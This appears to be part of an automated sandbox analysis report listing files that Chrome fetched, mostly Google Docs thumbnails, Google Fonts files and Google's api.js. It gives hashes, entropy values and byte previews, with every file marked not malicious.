                                                                                                                                                                                                                                        SHA-256:F4D4ABD55A4D3980C900AEE116BC89D7D5D10E44E6FB16FD04F0BA6C2100FA0B
                                                                                                                                                                                                                                        SHA-512:2C71312C91E156A6ECC463F18248C8BA24B7891117A749B353A35F525BA8B30575EDA1AD200262087BB19AC3801754BB2E87D238F860BC3249CE231EF51DF664
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..?.IDATx...1.....0.K...[.E.,!,@X..... ,.a....V....a............@X..... ,.a........a...@X..... ,@X..... ,.a............@X..... ,@X..b...h.0..<..k.m.m.m..o.3.iz....}o.....I.....t.....W.%..9..8m.t4...(..i......Y.#.X..`9r.....,.X..[1..~..........`.....Um...[,.?|..??..^~.'O..K-[..E..Y.gE*W..Z5^.|..{w....-..J....?w...WW.K..,.C.5....o.1{...kf.....Vn....~...t....k4..%_....8S...d.y.......b6KO...F....._2.Z.r..#..=~.....H.a..0C....g..J}.....N.3...k.....{..J.../.K..uf.u...x..n.).c2D..<.kV..O..i....\.g...9.:s.l...4.[......M).Y.Z....T)....m..../.....\.r.......&..t....g......X....'...sg....&..GO.M.C.k....l!g.\.......v.L....X.p:.+_.....7..`.?y..l..f)=..0...E.ZL.........0..=.Ie....2.[wl..@..........V.Qm.`...5.%..`.V.W.".H..D../0lpK.....S'B........M...C..{...m...J..I...u...!...W....;.CDS.M..*]{w...'8A+...P.....KW,.r..<t...>.....i ?g..[p#.0.t.2..'.a..>..+d.4.<.\..ZV.....m..Y.........}....n ..3..3..d.69.%
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):10888
                                                                                                                                                                                                                                        Entropy (8bit):7.865297868743237
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:Ts1kQBx0a92MSzc3jyYTq58esT14t7gXDZXn45WDxGY1u9G:A1802MZbW6esJ4tgZXn4Mbu9G
                                                                                                                                                                                                                                        MD5:AE6E5598E1C5D6AC511CDA6CDC03CDDF
                                                                                                                                                                                                                                        SHA1:A485B00FDD94E7CF6B6C200861049AF8827AD471
                                                                                                                                                                                                                                        SHA-256:074E51B8A8FB8E278541CA6590F3757135B3A727F79D5F78CA24D631103C9AB6
                                                                                                                                                                                                                                        SHA-512:30A4E9E92BFB381F24AEC31BEFBD9EE8E2C67EE1BD01446E646C60F462C5B3BBC9137DA2231AAFA143CB4D5B37E8667483FC5FAB3D3B0F471E10997777FE2B3A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1cu03uKzPPatfGMQZyBUE7zqoR28WPrKZeJPJa3Qwano_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..*OIDATx.....0.E.J..4+.....q. |......`... X... X.`....`... X......`... X... X.`....`... X......`... X......`... X... X.`...@G....@.....,..v...1.`.....(8..{-3.e......aff.....033s.p.0G...$....`K......u..{....s.....Em`!W.;,.>!...>@.0s..i..|..r..K....q]..&..&...2...uD.z.U6,.[c.......EV^^.P(.@.TjA.K..G.>..k...........1...b.-...C6,.A.y.dE<.H......Y.5...:.....S.6..c'~a..|..._\..z...I6u....................X....L...l..Lvs.vL.L..o......s....G...R..}....6UPP............#.._d.....`.qv<I.HF..D..+...&R.JF;V.4.... ...?..B2.$S.....N..."L.....L*....d.JHH.....nc..6..............--...*.{##.....gggKKK."^.}..dj.'.hR.1l.$}..p_.x....6.8..(N..>..,....q..*!&..r.l..c>.. ..k.A.....n...3g.Tjjj^^..sss...SSS....566..j.J...0.CH..5....KOp0.z.4.....N..U...&....u..9.N.........$..u4GK......tU..?..=.4.."n-c.O...........\\\...5......T...4......?.<33s~~..877..X}}.....2...I......9.vT..<....q.bC..(.P..V.V8..O ....EP..g..hr .d..\.o.-..z...a.\....z0...]
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 44316, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):44316
                                                                                                                                                                                                                                        Entropy (8bit):7.994860790146446
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:8iY5YSLtv5kwY3p+6OWzOz3UaFfQOJSLUQOk484megEUNdg5kNaK3vUr/H9/zvBE:8iYNqz3p+hWzObpFBJW5OjWegEvOPU7I
                                                                                                                                                                                                                                        MD5:F4B0DF592BED06B7E1AC275945D8EE61
                                                                                                                                                                                                                                        SHA1:DBD15D6534D7ADEF8E4AABA1A89E7A2CE22B16FD
                                                                                                                                                                                                                                        SHA-256:C8FB82DF9421FA2DE18E11B89200EECCB188DAB713331F06C6C8782AD5CE5437
                                                                                                                                                                                                                                        SHA-512:BE5EA92F8F78869D5EF69D96B2688FD6637E3BAD65C15AA83E118C2C66357B9417993BECCD752B12A68A6C0E6ADB7D1E69F6FB1E8221CC608EC33726DED7C69C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/nunito/v26/XRXK3I6Li01BKofIMPyPbj8d7IEAGXNiSnc3jw.woff2
                                                                                                                                                                                                                                        Preview:wOF2...............0..............................$...x..4.`?STAT@..*........O..6..6.$..^. ..<.....[......S.....t..`..k...W#..EJoVXt8~A..W..y...~J.......%..^.p.</."..u..k.z..4.P.8....q.L8 3.y9.X..........%..+.Q...#...].......}.p.xE6.......aYp......4...V........{wy...i*.i^.IG.G.dw...7...5.,W...#ch....h..O..l..z.......W...Ge.9.R}.._....N......L...lv[{7?.$K.o......W...fn..,.+..^UIGd...'/.<.es..;...*...F....N@rIO..(......C..Mx....1.uo.@z.rw....b$....;.&P..'...a...t..?f.bq....^....#...?..=....<L..xc......!........{...3..g..+..X.......Dm......I...B.J2+v.3.D.E......]."..(...s.a...V..RCH.d7.@j!.R.$.......X:....l......;[.r..........3...............U...... '..;P.o.@>.e.... 7EP....#..R!n.:p.g.......l'..~.YR,.r.TG.....r.I.W.!.c/ .w..W..U..a/.....e_[........{..J..dM.F.._..[6[].lF.....d...P......~...3?.1...g...d.kK.RJX..../T.....C..y.c...P.p"..!....y.W{;\/].....e.P.....,....0...._.'....g.s\<FBH .w.nF..<....XAq.3..{.K&..%.Z.;......!.*...Z-.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):53637
                                                                                                                                                                                                                                        Entropy (8bit):7.99060895641039
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:8+i2VYFwLKNwEnDDvb0tgrruEVhbXB+OFA8LVzRb5JtyCSdGWMgljCw:8+iFk6webbruEnaEVzV5VSCgdCw
                                                                                                                                                                                                                                        MD5:ED16592A50EEEDA2166D931043D629A2
                                                                                                                                                                                                                                        SHA1:F0D9D469C531A06072496D789759AF92588C3E25
                                                                                                                                                                                                                                        SHA-256:94BBC776DA08F88AD32B29E3F8952EA41D96CB6C038ECFC504BCD0132F004D02
                                                                                                                                                                                                                                        SHA-512:A21E95B027573D8C49E75873ABB7084CD4A704996734AB087D63ECD5807F2601AC4938B1059096D94AB66CF22E8529194B63F12F3DBC7A208E3AED380DAD2E73
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1pOVaMlI4OyVc3-MrXrzmBL723P8fb47jhU9lstIxJNk_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(...LIDATx......... ...s|B.R.'R.a......VX...8..Zr..WU'..k?.k..m.m.}.l..[.^.Q...L...l......S]lTWg<(.U.{.k03...".@B...CB@D..q..z.,..P:l"(@DkPQ.Gd......<Fk-.%..{(.3FvR..fV.V..<.....e(.,a..X)~i. 1.\..&.O.u...c..J*Kaf.5...k.!#..4D.0H..P.H.K.Jy.X....'...}.....>@3I...g........$?0..=e ..(.... .[f..5....FF.&......{.c..q.....1I.c.3.<?b.....>c...[...l,m[...:{.!Sk...e.*}.a3.-......C...q.a....@=.I.GiH.zT.%.KA.v..i;......N.U...}6.0..V.l.l..',%.MX......w$?Zk}FN.8f..Z..>8....3.a....=*J7.xR...s.....A).D.}......n.... 1".C0,.X.(.VQ...+..R..U..$,..N..mI...S./(.B....(.......~..|3i6.&.*...6>.o\.}..p..0.O..w.\......M.^...u..d.>.AIXo4..j....Z.]t.GU..99p.....!.Zsu.2.8....<.ooE...L.....?..c...<..#p>.B.~....z...7.v..y..P.:s.OX+..,"Rg..F"t........dV:...v3..;.m...,...l.*.7.(A..b.d...g.:.......mS..4]JK.I(...{.K..u...O..[..>....".<.U......v.......,~J.... e.d.......R....i..x.....3...tO.!..N!...d.,Q.._|..G.s#..I...............?..|]..#...!as.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 50372, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):50372
                                                                                                                                                                                                                                        Entropy (8bit):7.995685302339476
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:JUP7WB7vQPjldKR7Q2DC9y5oGyaIAH/PyTxY/6:ykQPjlG7Q2DC9IaaIIYxu6
                                                                                                                                                                                                                                        MD5:7CD733CC1479E6442254262828FAA384
                                                                                                                                                                                                                                        SHA1:03F59B138B54A462A522A0E4F4B13E81E03F8EF8
                                                                                                                                                                                                                                        SHA-256:ECE67ECACA6A1DD35419E90DC7E3392C186A7A01117F6BF431A2D4DCDE9E09FD
                                                                                                                                                                                                                                        SHA-512:BCD05A82F5EE437459744C411DCCE4D42F90EB9EEFFB26BACBFEC344D097FAFDFEE116C28CE6B190CCC0E4E56F7243BA16B2FEFE439A7AE9E1B566F4484371FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v47/KFOMCnqEu92Fr1ME7kSn66aGLdTylUAMQXC89YmC2DPNWubEbWmW.woff2
                                                                                                                                                                                                                                        Preview:wOF2...............x...Z..........................f...&..R.`?STAT^.....~.................6.$.... ..x. ..N[?...z.6..F.v..|.a...~.9..L}wS.....U_.t.<..'...........O.1M......"..V...-...\.v.=.Cb..%H.G.5.....p..d.h:...s.Rc@n..5.Y.\...+".zCDp?..4!...)....Bm1..ws.)5.q....6...p..5.=<.?2...o.&.......-...jY..Y..k.....OL+......)..}B.x[#..d.;.w."v.)..I9....g.H.)...D".N.@.~.R.`........1...t.R.D).0../...;.(:7/5|.X../\..b.x..4e;..V7.II..X...iCQ"..EOwH.r..ei.S.P.-.A......L..".4<.eu~..o...7..s.......Z..q..H.q..<.9O......7.&f...L..;...H3*.mm+.........s............'.Y...P....v.PD"2.C......KD.;BS:Ps...E.....c.+!..........a....v.....c%.....p..Bd*k....E.....+i.+...[Z..5...W...........d..zw...............@.....MYl..D.............@....%a"...QQ...wM..s..X.P.......95..d.......S ....J....A...D....T....;.6.P..oNm....jB..4.O..!....,.O..r..D?'...F..;i...mC.x.%.&.I>.x.EHp..k...XU......qu.r.m*.....H.1..m@$M....D..F...-.j....i.\..UO$.....}:........R...qD.....>....)..C...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):48419
                                                                                                                                                                                                                                        Entropy (8bit):7.983881391518331
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:p3McRIGcdlJlymrOoyxCgzC6lnZs6swcsq/oLOick28AndfkzwF6ac+3:Bo3fdwZfZ5swP1OiHkdfQO
                                                                                                                                                                                                                                        MD5:8CADD9A6BB191B07E02AAA8FD4674C18
                                                                                                                                                                                                                                        SHA1:D11602FE15576BD73CF69C013F451F4476FF6EE6
                                                                                                                                                                                                                                        SHA-256:F223DD191DFDC71A242D3EC35C4BC3CD40A43000A81998F894E41D3D2A91AB34
                                                                                                                                                                                                                                        SHA-512:10D15479C4414D0CE3116D44864B274A105E7BEB0786482443AD7ED3F2A4BE565C954529D30010A51D8EC1B4C29310F3A0260D424236C3BEB0FC1A260963FBC3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx...1..0...yB...*........... ,.a........a...@X..... ,@X..... ,.a....@X..... ,@X..... ,.a........a...@X..... ,@X......twUefD,;v.C!..q..[.F...8....&.....Q.Y.....vt.{..m..%.......}..y.w]7M.c....,..8.Q..]..}..!.[...:..*.M.$.......:.#MS.G.....@...VEQ...yd...u]...@..a.....u.k...^..,Kzh..XH).yn.&..{f.N......8...$. ...H(Q(I......*."..$".E....$$*."H...K.d..^9...P...y...v...]...|.z..........y...V.V.U*..D"...f..n.......H$..Xl4....b.`....,[....|..d...|.-|&W*.|/3.`.j.......O.^.;..tz..e.b.|.....m..-..>>>T*U2..............N..Kz.....\... ....d.R...B......B`..]p......U.c.X..E..y.x<b,.t:Q\...Z.J.F...vc....N'...U.&Lh4.h4...a.O.~..4....\.....D"A( ...h.ZP.....[:...g.I..C... ...?.T*.|.....u8. U..l.nH....___..x<~:.^...l.P(..^...0.v;B..n...d...1...Z.....f3..U..o....f..........U....\..P5!y...;4..V<\.._.9..Z....\....>9._.V...K.(...,%.....Qa....D.b..P4.M".Z....n..c..4...(<....].. $..$@.........$ED...H"...@`..e}..|fv..a...}...y...#.....W...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18482
                                                                                                                                                                                                                                        Entropy (8bit):7.954659369676826
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:lIyMkXI/84SILW2Eb0cD/tNNIZSLi3mHTnr2rUeZX+F:qyMk45zEIicZS+3+33eZX+F
                                                                                                                                                                                                                                        MD5:C366F8A6C41FEFDADF903E888F3E7124
                                                                                                                                                                                                                                        SHA1:76668DE031AF82BB7F270B26AD0FCBF7927F6A14
                                                                                                                                                                                                                                        SHA-256:2863968E71F874C73EF0BB37D271059E434256D24F39F12E410859B21D41F32E
                                                                                                                                                                                                                                        SHA-512:AFE8CC69C36B75DC28D347C8ED9A6D51130C1BF2548B1643ECBC34BB9440840459152BD2898C282902373A1D125ADBF6E445CA3A37D76670BA3DC6863CCDAABB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..G.IDATx.........0.GV.......<Q......a...@X..... ,@X..... ,.oa...@X..... ....g.:..Q....?xV....m.....o'5..uun.Tu..O.?...;..0......p.=z...o..o.......@.P...~..j.b...>)<^......l...F.P^..x<..............nhh..^>.O...Jt...UT....%2.A.....<.`{..&.fG.'O;...0......."......T*.^..TPP..h,..P(...........x<....|...uu5......j5j...9..........P(TXX....\...D..f.fck...O...x.}...PRr*..f..J..^..py...........csK.\....%.v...P(/^X..kiii``...dcc...q.....!.STT.=-.....B@..aoo...j.X_]]....C.z.............h...6w....NfV..............&.B...........OLG..6...P(../...u..!.....-//.Y...G....l6VX.c.t:u:.T*E."#..s.^......511.....H.[N.+............S.................0/.........@>B...d2........j.o.Dh.. ..%..x<......b.D.aA[G.A3.D.RYQQ.....a..##!..=....R...cb.....o..<.....G.B.....9....I)..9\.J.-.)#....y.P(.)!R.[#....ub.@....5[.'.....p.....^;].].....].1.......h....lw.*=!.[.a.X.e9.6...D...+.UQ.. Xo+.*I.8.4..y.v>..`... X... X.`....`...p.`... X......`... X...;.O
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10693
                                                                                                                                                                                                                                        Entropy (8bit):7.858999646429827
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:HLkacSi3NuDzOUcdRXXzUdhdSRNiF70xHPrh3pHhiw6NpdSmxfsXd3vJ:r3guDz2R4ebxF3pQw4z/WXJvJ
                                                                                                                                                                                                                                        MD5:1E94B7B60FCD47DB5CF5172292220F6D
                                                                                                                                                                                                                                        SHA1:32C417D0537E73B2D432AF5527F3D7924CF7071F
                                                                                                                                                                                                                                        SHA-256:7FBFF67006DFD17883523CCEC40AE4A209839B5C3C247EDE9F97931977761ADE
                                                                                                                                                                                                                                        SHA-512:63B3260D9894B3D78DAF34D9C62299624921055984BFB7C041EE4EA2E922681259BB0EFDA860FD2415219C52572903910867D1F221341F7E762548DCF4A09B82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..).IDATx.........0...%. l!...H... ,@X..... ,.a............@X..... ,.a........a...@X...............@X..... ,.a..... ,.a.......8....d....SX.....m..=n.m.........k1hDG..q.T......9yz..n.....e<.Z..I.....F..5....a....b..ZZ.Rm>F...._...h4j.2[/k.....v....f.5K...l>it.-M..a.ShL.0.....&zzT.@^.zCZ...q.j7*...7/^..An...z<.Xf.6.^.f....W.^.b..._..mmm-//...QQQ7n.p.j.=.........X..._.T....<...s&.mk.u.....g.`G..EZ...'O..*+........d...........=99....N..R'[.#~.3....!.h_9...).. mX..#....>..j9...7u.......8p //....hrss......nooW...._PP@...}.vEjEEEDDD]].1bcBBBxx..a)(..\...6{..m,.!.E.D...a.`.D.V*JSE.=Q.-g..E}...qF...^&.B.....E..a,s.m..V.......u&333%%...tENjii.4.L....J.._*.......HV...UMM.2.......rXss.......7..u..........;.....t2,.3r.q...Ac. am2N........<Z$..o.......M;.a..&N..V.Sjm...}||..<...~.z.-[v.....7......].......j...`....{...7.....?..G......O6...e.X2......D"5m...+.-.2<k.<.y.....2y.9 ....;E.,./......%....(..0,mXT....r.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 1256, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1256
                                                                                                                                                                                                                                        Entropy (8bit):7.767364329523114
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:QIz1dMQFq2XNS2sAy8z6ija18fYBKk2oVeypqRcvV5W548yqyujMtrP:J7o2O66W+8oVrp+cvrVneQNP
                                                                                                                                                                                                                                        MD5:6DD9A903A2068612E4F0D7572E284077
                                                                                                                                                                                                                                        SHA1:A87CE7B07CC3C4F09AF54E2310B97F4678935F7F
                                                                                                                                                                                                                                        SHA-256:35015DC730E404653F8B00639C287105BC4D09A58C9235659B99150AA1B220BA
                                                                                                                                                                                                                                        SHA-512:19001F23C7697FC0838D828A34D56F85658E188E2AF704AD117BE0A60063DEF37A8B960548E4BED40612F855CA9C26947382111634B841A9628B8AAD9DA48BF9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lexend/v23/wlptgwvFAVdoq2_F94zlCfv0bz1WCzsWzLFneg.woff2
                                                                                                                                                                                                                                        Preview:wOF2...............(................................F.(.`?STAT..d....t.`....6.$.*. ....[...c.H...xC$BE.4"S.....4.........t.b.L.Z.......Y.l..h../........`.!..8..I._2a.n..............)..o...om..j..t.....H^c...'<.u>..(...; .)o2>...a.(..@.BS..M..].....bs.[.7#. .....TYb.MI./sL.6u..2.`;X.0..-hS...wV..E($...gR..{q...9.F:.F:....D...@?.....?Q...."h._..."...\.....0.v...p..C..... )....@...P`8L`8...`.0......@..RB._w....d'D..........T..q.F....Q..v...u.r(.m.....%..x3B...!.r..[....{!..........S.$...m...&8.hHp0=...y....*..lyr.....({Wo?...bE...n~.X.'....&.%iAtQd..M...l....Z.....Nj.}.7....^..>.L......B........h....f...Cg.s.....oRP.G.....&.7..K..........9I...L.)S..Ub|05~..).5..Z......H..ad:..{{..g8..0D.Q....G.LP.....P..........B......-ut..V!...T....m..#..[.)oEe...]U...M.|.5LT..b.........d.D........J..-i.U,n'.o.!nm@...........F}6^....u..e..W.a...~.v(..c.x..._d....r^.).:........@.0....`j..XG...5.`4..W....K.c..5...<.7...%.<){....'(....N.A5.......bP.[m.`T.xp....+.....X.h
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 72628, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):72628
                                                                                                                                                                                                                                        Entropy (8bit):7.993648298573699
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:NH8XGACZrcOOWTRl2bvXPHCWTIBu3TTISSpufTHck8cFa:NHf5l2TX6tJbU8cs
                                                                                                                                                                                                                                        MD5:0F19855AD401FDEA3E11BFFE0D4E265B
                                                                                                                                                                                                                                        SHA1:44227668D70FC0289CDF988867A619E8E2960CE5
                                                                                                                                                                                                                                        SHA-256:9A0BEE97B056F9A0972D23BA254990353FD2FA23E11F0B4BD34B25E1AB4A0A4D
                                                                                                                                                                                                                                        SHA-512:339FF2A58B0DE425C410A21011901823B2D833356D5BFE586D251E33F5D594C68D62F016C779CA5509B46E648EF4809FAAA603029B656A0730ED5D46E7A48BFF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/robotoserif/v15/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcEls0qp6I.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............P\...P..........................P........`?STAT....P.....T.....6..6.$..h. ..R..?..[.....w.....2..N9tq.Y.&...!vk...j...f..cl.t+;...pY.......q......I.....................G|n......?s.... ..$@..2AQPD.Z...D...S.0...M..R......+!.Wky.P4.Z.4[..-....t....g.-V=....1@..\d..>.Z. f#.s!.#.....@...!.O..>...d.GB...qF#.9Gr....r.S_..X.#.:.#Sm.\(.!.7H...[.1.Q.+..x.2..1..}w@.nb-.....fY'.).w$:..C.D..[+..h4..u.fP.r..z.G....B.U(.r *..... v.......8.1......P.6/...Or.$b..'...wb|..3r......$.....HI.p....6.hp)$.....g..."2s.gFh.&*..$...+.....%z..R..R.V....9....D.tN.w.ts3i.I..&B...l*|.9..O..o.-..O.s......6.p..A)..2z[A;.b/....fi..%V..Q.kn..A...F..6...Y..=sy..q..jN..U....ae."m..|d.i.K.T......p.D............*.y.)...qu.^.\..I....5.;....y$.R.P.s.oV..+Vk..'.3...C...;...io....Y......}|.6...lYhaf....]..d7...b..4.u....5.3F*.@..-I..$.....N.f....T.....C..1...?`.%dM...fHw.9.$0-..}.pF.ia;7.N...(.!.A........V..wF7.J`<9.J\...S ..i...3.cn52.2?........D?.Il......mE%.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2049)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):14456
                                                                                                                                                                                                                                        Entropy (8bit):5.4707085201840036
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:IYim7O/sAg9U6KAQdkzFC+5aiWQLHO91tIuW:IoqUAh8vz7W2N
                                                                                                                                                                                                                                        MD5:678B03FE0FAF217F72657826DA4434A3
                                                                                                                                                                                                                                        SHA1:8440257C2077AB3B12A986BB42C61E8101555730
                                                                                                                                                                                                                                        SHA-256:554E912AFBA0302DF368EA48ED975A64B8528A70793071194FC7E86E62963730
                                                                                                                                                                                                                                        SHA-512:02C6C996E7FC5DEACF5DB40FCFFCB73D14BFC3898E0438778C7445B0292EAE41165C134ED621E81FB9A3657704325C523CB45D9629FF86280148B371A0416A91
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://apis.google.com/js/api.js
                                                                                                                                                                                                                                        Preview:(function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),g=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-.1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular expression");return a+""};.g("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=h(this
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):18482
                                                                                                                                                                                                                                        Entropy (8bit):7.954659369676826
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:lIyMkXI/84SILW2Eb0cD/tNNIZSLi3mHTnr2rUeZX+F:qyMk45zEIicZS+3+33eZX+F
                                                                                                                                                                                                                                        MD5:C366F8A6C41FEFDADF903E888F3E7124
                                                                                                                                                                                                                                        SHA1:76668DE031AF82BB7F270B26AD0FCBF7927F6A14
                                                                                                                                                                                                                                        SHA-256:2863968E71F874C73EF0BB37D271059E434256D24F39F12E410859B21D41F32E
                                                                                                                                                                                                                                        SHA-512:AFE8CC69C36B75DC28D347C8ED9A6D51130C1BF2548B1643ECBC34BB9440840459152BD2898C282902373A1D125ADBF6E445CA3A37D76670BA3DC6863CCDAABB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1BWCGg7vpuVNop_bITuVY6zpI-Pnut-MF7jj8l4bsTnU_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..G.IDATx.........0.GV.......<Q......a...@X..... ,@X..... ,.oa...@X..... ....g.:..Q....?xV....m.....o'5..uun.Tu..O.?...;..0......p.=z...o..o.......@.P...~..j.b...>)<^......l...F.P^..x<..............nhh..^>.O...Jt...UT....%2.A.....<.`{..&.fG.'O;...0......."......T*.^..TPP..h,..P(...........x<....|...uu5......j5j...9..........P(TXX....\...D..f.fck...O...x.}...PRr*..f..J..^..py...........csK.\....%.v...P(/^X..kiii``...dcc...q.....!.STT.=-.....B@..aoo...j.X_]]....C.z.............h...6w....NfV..............&.B...........OLG..6...P(../...u..!.....-//.Y...G....l6VX.c.t:u:.T*E."#..s.^......511.....H.[N.+............S.................0/.........@>B...d2........j.o.Dh.. ..%..x<......b.D.aA[G.A3.D.RYQQ.....a..##!..=....R...cb.....o..<.....G.B.....9....I)..9\.J.-.)#....y.P(.)!R.[#....ub.@....5[.'.....p.....^;].].....].1.......h....lw.*=!.[.a.X.e9.6...D...+.UQ.. Xo+.*I.8.4..y.v>..`... X... X.`....`...p.`... X......`... X...;.O
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):28
                                                                                                                                                                                                                                        Entropy (8bit):3.950212064914748
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WZoS8/ZYn:WZoS8/ZYn
                                                                                                                                                                                                                                        MD5:C3F64CB2A8B00CBBC30CE2908208A29D
                                                                                                                                                                                                                                        SHA1:E4AA7CAB67F4CF5FA52371DDC25A75AAFD4D0CCC
                                                                                                                                                                                                                                        SHA-256:391601283994BCD9486160BF8A5637410D280E1BDDD3AEF5428454976E193E81
                                                                                                                                                                                                                                        SHA-512:6CCBC26128FE65D6D313B965DA3D2E201D506442D0036404ABB490BE0FC99B3A0FDB611269B932DBA7F3A621E11F79ED213D2B11D487EE39C54A17D97A823552
